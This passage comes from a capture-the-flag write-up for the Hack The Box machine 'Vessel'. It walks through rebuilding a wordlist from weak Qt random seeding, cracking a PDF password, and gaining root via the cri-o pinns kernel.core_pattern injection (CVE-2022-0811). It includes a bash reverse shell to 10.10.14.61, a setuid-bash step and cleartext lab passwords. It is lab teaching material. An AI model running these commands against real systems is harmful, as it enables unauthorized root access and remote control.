I wrote a simple python program to generate the wordlist:
(From the screenshot, we know that the password length is 32 and all characters are used)

```py
from PySide2.QtCore import qrand, qsrand

charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?'
passwords = []

for seed in range(1000):
    qsrand(seed)

    password = ''
    for i in range(32):
        idx = qrand() % len(charset)
        nchar = charset[idx]
        password += str(nchar)

    passwords.append(password)

with open('passwords.txt', 'w') as f:
    f.write('\n'.join(passwords))
```

I tried running it in the container, but it was an alpine container, and I kept facing errors.  
Finally, I tried it on my host:

```console
opcode@parrot$ sudo apt-get update
opcode@parrot$ sudo apt-get install libglib2.0-0 libgssapi-krb5-2
opcode@parrot$ python3 -m pip install PySide2
opcode@parrot$ python3 gen_wordlist.py
```

I tried to crack the PDF password using the generated wordlist and it failed.  
`qsrand` and `qrand` are deprecated, and not much info is available in the documentation. But looking at the recommended alternative, we can learn that `QRandomGenerator` is always seeded with `system()`. On Unix systems, it's equivalent to reading from `/dev/urandom` or the `getrandom()` or `getentropy()` system calls.  
But we have a Windows executable that does not have any of those.

Therefore, I started a Windows VM and ran this program there:

```console
PS C:\Users\opcode> python.exe .\gen_wordlist.py
```

This created a wordlist utterly different from the previous one.

## Cracking PDF password with John

I skipped this in my explanation earlier, but I had slight trouble with cracking the PDF password.  
To get the hash out of the PDF, I had used <https://github.com/truongkma/ctf-tools/blob/master/John/run/pdf2john.py>  
It had slight issues, and I had to modify lines 114 and 117:

```py
        if(self.is_meta_data_encrypted(encryption_dictionary)):
            # sys.stdout.write("%s:%s:::::%s\n" % (os.path.basename(self.file_name.encode('UTF-8')), output.encode('UTF-8'), self.file_name.encode('UTF-8')))
            sys.stdout.write("%s:%s:::::%s\n" % (os.path.basename(self.file_name), output, self.file_name))
        else:
            gecos = self.parse_meta_data(trailer)
            # sys.stdout.write("%s:%s:::%s::%s\n" % (os.path.basename(self.file_name.encode('UTF-8')), output.encode('UTF-8'), gecos.encode('UTF-8'), self.file_name.encode('UTF-8')))
            sys.stdout.write("%s:%s:::%s::%s\n" % (os.path.basename(self.file_name), output, gecos, self.file_name))
```

```console
opcode@parrot$ python3 pdf2john.py notes.pdf              
notes.pdf:$pdf$2*3*128*-1028*1*16*c19b3bb1183870f00d63a766a1f80e68*32*4d57d29e7e0c562c9c6fa56491c4131900000000000000000000000000000000*32*cf30caf66ccc3eabfaf371623215bb8f004d7b8581d68691ca7b800345bc9a86:::::notes.pdf
```

`john` cracks it instantly:

```console
opcode@parrot$ john --wordlist=/home/opcode/Opcode/HTB/passwords.txt hash
```

We get the password:

```text
YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS
```

This password can be used to open the PDF, and we find `ethan`'s password inside:

```text
b@mPRNSVTjjLKId1T
```

It works for SSH and we can get the user flag:

```console
opcode@parrot$ sshpass -p 'b@mPRNSVTjjLKId1T' ssh -o StrictHostKeyChecking=no ethan@vessel.htb
```

## Privesc with `pinns` binary

We had already found the vector for root earlier:

```console
ethan@vessel:~$ ls -la /usr/bin/pinns 
-rwsr-x--- 1 root ethan 814936 Mar 15  2022 /usr/bin/pinns
```

I transferred the binary to my VM and looked at its ghidra pseudocode.
Initially, I saw terms like namespaces and cgroups flying around, suspected it to be a home-baked container implementation.

Running the program gives us:

```console
ethan@vessel:~$ /usr/bin/pinns 
[pinns:e]: Path for pinning namespaces not specified: Invalid argument
```

Searching for "Path for pinning namespaces not specified" on <https://grep.app/> would take us to <https://github.com/cri-o/cri-o/blob/main/pinns/src/pinns.c>  
The source code for the binary is available there.  
By googling "pinns cri-o", I found this:  
<https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/>

In a nutshell, we can pass malicious kernel settings via sysctl parameter.
They have used a Kubernetes example, but with `pinns` binary, we can pass kernel parameters in this manner:

```console
pinns -s kernel_parameter1=value1+kernel_parameter2=value2
```

Their payload was as follows:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
   sysctls:
   - name: kernel.shm_rmid_forced
     value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
```

Checking the version, we can verify that it is vulnerable:

```console
ethan@vessel:/dev/shm$ crio --version
crio version 1.19.6
Version:       1.19.6
GitCommit:     c12bb210e9888cf6160134c7e636ee952c45c05a
GitTreeState:  clean
BuildDate:     2022-03-15T18:18:24Z
GoVersion:     go1.15.2
Compiler:      gc
Platform:      linux/amd64
Linkmode:      dynamic
```

First, I created a bash script:

```console
ethan@vessel:~$ echo 'chmod u+s /usr/bin/bash' > /dev/shm/opcode.sh
ethan@vessel:~$ chmod +x /dev/shm/opcode.sh
```

After reading the blog post, it makes sense that I should try:

```console
ethan@vessel:~$ pinns --sysctl 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/dev/shm/opcode.sh #'
```

But it kept throwing errors, so I had to read the source code at <https://github.com/cri-o/cri-o/blob/main/pinns/src/pinns.c> and figure out the appropriate parameters:

```console
ethan@vessel:~$ pinns --dir /dev/shm/lyssa --filename opcode1 --sysctl 'kernel.core_pattern=|/dev/shm/opcode.sh #' --uts
```

We can check the kernel parameters with either:

```console
ethan@vessel:~$ sysctl -a | grep 'kernel.core_pattern'
```

Or with:

```console
ethan@vessel:~$ cat /proc/sys/kernel/core_pattern
|/usr/share/apport/apport %p %s %c %d %P %E
```

Unfortunately, it did not work. I was stumped hard, and studied docker internals for a while.  
`unshare` creates a new namespace so the conditions from the blog are satisfied, and my command should change the kernel parameters for the host, too, because containers and host share the same kernel.

Turns out, I was extremely unfortunate with this one.  
For some reason, `--sysctl` does not work, but `-s` works. I still don't understand why.

```console
ethan@vessel:~$ pinns --dir /dev/shm/lyssa --filename opcode2 -s 'kernel.core_pattern=|/dev/shm/opcode.sh #' --uts
```

I changed nothing else, and it works:

```console
ethan@vessel:~$ cat /proc/sys/kernel/core_pattern
|/dev/shm/opcode.sh #
```

Now, we just need to cause a core dump. I wrote a simple C program for that:

```c
#include <stdlib.h>

void main(void) {
    abort();
}
```

```console
ethan@vessel:~$ gcc -Wall wild.c -o wild
ethan@vessel:~$ ./wild 
Aborted
```

Oddly, when the `core_pattern` is modified, core dump is never created.  
After a while, I figured out the reason for that as well: my bash script was missing the shebang line.

```console
ethan@vessel:~$ echo -e '#!/bin/bash\nbash -c "bash -i >& /dev/tcp/10.10.14.61/9001 0>&1"' > /dev/shm/opcode.sh
ethan@vessel:~$ chmod +x /dev/shm/opcode.sh
```

Now, we can redo the exploit:

```console
ethan@vessel:~$ pinns --dir /dev/shm/lyssa --filename opcode5 -s 'kernel.core_pattern=|/dev/shm/opcode.sh #' --uts
ethan@vessel:~$ ./wild 
```

With this, we can get a shell as root:

```console
root@vessel:/# id
uid=0(root) gid=0(root) groups=0(root)
```
